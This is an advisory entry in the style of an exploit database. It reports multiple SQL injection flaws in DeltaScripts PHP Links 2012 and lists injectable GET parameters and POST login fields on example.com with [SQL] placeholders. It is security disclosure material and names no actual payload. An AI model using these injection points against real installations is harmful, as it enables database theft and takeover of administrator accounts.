DELTAScripts PHP Links - Multiple SQL Injections

Author: L0n3ly-H34rT
type: webapps
platform: php
port: 
date_added: 2012-09-10  
date_updated: 2015-08-16  
verified: 1  
codes: CVE-2008-6720;CVE-2008-0565;OSVDB-53672;OSVDB-41145;OSVDB-126494;OSVDB-126493;OSVDB-126492;OSVDB-126491;OSVDB-126490  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 37786.txt  
source: https://www.securityfocus.com/bid/55478/info

DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected.

http://www.example.com/phplinks/index.php?catid=[SQL]

http://www.example.com/phplinks/review.php?id=[SQL]

http://www.example.com/phplinks/search.php?search=[SQL]

http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]

http://www.example.com/phplinks/vote.php

In POST method :

id=[SQL]&rating=

http://www.example.com/phplinks/admin/adm_login.php

In POST method :

admin_password=test&admin_username=[SQL]&submit=Login

http://www.example.com/phplinks/login.php

In POST method :

email=[SQL]&forgotten=&password=[SQL]&submit=Login